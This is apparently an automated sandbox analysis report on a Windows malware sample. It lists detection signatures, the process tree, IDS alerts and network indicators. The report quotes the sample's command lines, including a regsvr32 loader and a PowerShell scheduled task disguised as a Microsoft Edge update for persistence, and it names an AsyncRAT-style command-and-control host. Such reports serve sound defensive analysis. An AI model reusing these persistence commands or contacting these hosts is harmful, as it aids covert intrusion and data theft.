Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
i9DKxTZoVd.exe

Overview

General Information

Sample name:i9DKxTZoVd.exe
Analysis ID:1572121
MD5:108b6783fb581f9f9ce33936379ee0cd
SHA1:d929bf4e5fa60a1084314149628458d44d2c2a83
SHA256:02adaac35a67006fb3424a7e8264fccac9b54e2791f333f16bae2f3245efb4d7
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Uses Register-ScheduledTask to add task schedules
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64native
  • i9DKxTZoVd.exe (PID: 7076 cmdline: "C:\Users\user\Desktop\i9DKxTZoVd.exe" MD5: 108B6783FB581F9F9CE33936379EE0CD)
    • i9DKxTZoVd.tmp (PID: 7504 cmdline: "C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmp" /SL5="$1041C,956295,140800,C:\Users\user\Desktop\i9DKxTZoVd.exe" MD5: 14C6FA8E50B4147075EB922BD0C8B28D)
      • cmd.exe (PID: 3540 cmdline: "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\i9DKxTZoVd.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • timeout.exe (PID: 3600 cmdline: timeout /T 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • i9DKxTZoVd.exe (PID: 4536 cmdline: "C:\Users\user\Desktop\i9DKxTZoVd.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: 108B6783FB581F9F9CE33936379EE0CD)
          • i9DKxTZoVd.tmp (PID: 8160 cmdline: "C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp" /SL5="$20468,956295,140800,C:\Users\user\Desktop\i9DKxTZoVd.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: 14C6FA8E50B4147075EB922BD0C8B28D)
            • regsvr32.exe (PID: 4232 cmdline: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\Swallow.dat" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • regsvr32.exe (PID: 4752 cmdline: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\Swallow.dat" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
                • powershell.exe (PID: 4292 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 4644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
                • powershell.exe (PID: 5652 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AF4B0CC-A257-4A7E-E201-D5DF536679FB}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • regsvr32.exe (PID: 3552 cmdline: C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • powershell.exe (PID: 7388 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\Swallow.dat", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 4752, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }", ProcessId: 4292, ProcessName: powershell.exe
Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 88.99.161.62, DestinationIsIpv6: false, DestinationPort: 56001, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 4752, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49761
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\Swallow.dat", CommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\Swallow.dat", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp" /SL5="$20468,956295,140800,C:\Users\user\Desktop\i9DKxTZoVd.exe" /VERYSILENT /SUPPRESSMSGBOXES, ParentImage: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp, ParentProcessId: 8160, ParentProcessName: i9DKxTZoVd.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\Swallow.dat", ProcessId: 4232, ProcessName: regsvr32.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\Swallow.dat", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 4752, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }", ProcessId: 4292, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Process startedAuthor: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\Swallow.dat", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 4752, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }", ProcessId: 4292, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-10T07:00:59.505222+010020355951Domain Observed Used for C2 Detected88.99.161.6256001192.168.11.2049761TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Roaming\Swallow.dat (copy)ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\is-N7DV6.tmpReversingLabs: Detection: 26%
Source: i9DKxTZoVd.exeReversingLabs: Detection: 39%
Source: i9DKxTZoVd.exeVirustotal: Detection: 22%Perma Link
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB99056C30 BCryptGenRandom,SystemFunction036,14_2_00007FFB99056C30
Source: i9DKxTZoVd.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Cloudy Floor_is1Jump to behavior
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9901D310 NetUserEnum,NetUserGetInfo,memcpy,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,LsaEnumerateLogonSessions,LsaFreeReturnBuffer,LsaGetLogonSessionData,memcmp,LsaFreeReturnBuffer,memcmp,14_2_00007FFB9901D310

Networking

barindex
Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 88.99.161.62:56001 -> 192.168.11.20:49761
Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 88.99.161.62 56001Jump to behavior
Source: unknownDNS query: name: 1hvnc.duckdns.org
Source: global trafficTCP traffic: 192.168.11.20:49761 -> 88.99.161.62:56001
Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: 1hvnc.duckdns.org
Source: regsvr32.exe, 0000000E.00000003.101876266085.00000000053B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digic
Source: regsvr32.exe, 00000009.00000003.101745297574.00000000050C2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101750988707.00000000050D4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101956821107.0000000005046000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101744354529.00000000050D7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101940941733.0000000005046000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101747125678.00000000050C2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101748685259.00000000050C1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101746518370.00000000050C2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101751706370.0000000005100000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101741715743.00000000050EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101752875137.0000000005102000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101748153353.00000000050C1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102062176560.00000000057C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: powershell.exe, 0000000A.00000002.101802236942.000002A4E6A5F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101905223523.0000025DB99C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.102005654098.000001E2753EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000A.00000002.101802236942.000002A4E6A45000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101905223523.0000025DB99C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.102005654098.000001E2753D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000F.00000002.102015220848.000001E27587D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
Source: regsvr32.exe, 00000009.00000003.101745297574.00000000050C2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101750988707.00000000050D4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101956821107.0000000005046000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101744354529.00000000050D7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101940941733.0000000005046000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101747125678.00000000050C2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101748685259.00000000050C1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101746518370.00000000050C2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101751706370.0000000005100000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101741715743.00000000050EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101752875137.0000000005102000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101748153353.00000000050C1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102062176560.00000000057C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: powershell.exe, 0000000A.00000002.101798259193.000002A4DE8C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.101779809519.000002A4CFD3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101896209492.0000025DB1525000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA29A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101994038719.000001E26D311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25E72F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: regsvr32.exe, 00000009.00000003.101745297574.00000000050C2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101750988707.00000000050D4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101956821107.0000000005046000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101744354529.00000000050D7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101940941733.0000000005046000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101747125678.00000000050C2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101748685259.00000000050C1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101746518370.00000000050C2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101751706370.0000000005100000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101741715743.00000000050EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101752875137.0000000005102000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101748153353.00000000050C1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102062176560.00000000057C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 0000000C.00000002.101837470212.0000025DA2827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101908630743.0000025DB9CC6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.101779809519.000002A4CEA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA16DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzA
Source: powershell.exe, 0000000C.00000002.101837470212.0000025DA2853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA2827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: powershell.exe, 0000000A.00000002.101779809519.000002A4CEA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA16DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000A.00000002.101779809519.000002A4CE851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA14B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D2A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.101779809519.000002A4CEA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA16DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000C.00000002.101837470212.0000025DA256D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000C.00000002.101837470212.0000025DA2827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101908630743.0000025DB9CC6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.102005654098.000001E2753B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.101779809519.000002A4CEA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA16DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzA
Source: powershell.exe, 0000000C.00000002.101837470212.0000025DA2853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA2827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: i9DKxTZoVd.exe, 00000000.00000003.101663444971.0000000002500000.00000004.00001000.00020000.00000000.sdmp, i9DKxTZoVd.exe, 00000000.00000003.101663862917.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, i9DKxTZoVd.tmp, 00000001.00000000.101665254233.0000000000401000.00000020.00000001.01000000.00000004.sdmp, i9DKxTZoVd.tmp.0.drString found in binary or memory: http://www.innosetup.com/
Source: regsvr32.exe, 00000009.00000003.101952377109.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101734444126.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057F1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.intel.com/support/gfx_feedback
Source: regsvr32.exe, 00000009.00000003.101734444126.0000000005319000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.0000000005319000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.00000000055AB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.000000000584B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.intel.com/support/gfx_feedbackx;
Source: powershell.exe, 0000000C.00000002.101908630743.0000025DB9CC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micrm/pki/certs/MicR_2010-06-23.crt0
Source: powershell.exe, 0000000A.00000002.101802236942.000002A4E6A5F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101905223523.0000025DB99C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.102005654098.000001E2753EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: i9DKxTZoVd.exe, 00000000.00000003.101663444971.0000000002500000.00000004.00001000.00020000.00000000.sdmp, i9DKxTZoVd.exe, 00000000.00000003.101663862917.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, i9DKxTZoVd.tmp, 00000001.00000000.101665254233.0000000000401000.00000020.00000001.01000000.00000004.sdmp, i9DKxTZoVd.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
Source: powershell.exe, 0000000A.00000002.101779809519.000002A4CE851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA14B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D2A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: regsvr32.exe, 00000009.00000003.101731450336.0000000005084000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101953113164.0000000005239000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101732892581.0000000005084000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101733366336.0000000005098000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101953392054.0000000005255000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952282689.0000000005239000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102031668502.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101871816850.000000000545D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: powershell.exe, 0000000F.00000002.101919557191.000001E25E72F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.101919557191.000001E25E72F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.101919557191.000001E25E72F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: i9DKxTZoVd.tmp, 00000007.00000003.101705778461.0000000006000000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, regsvr32.exe, 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/downloadthumbnail/
Source: regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/
Source: regsvr32.exe, 00000009.00000003.101952377109.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101734444126.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/r
Source: regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgamesettings2/
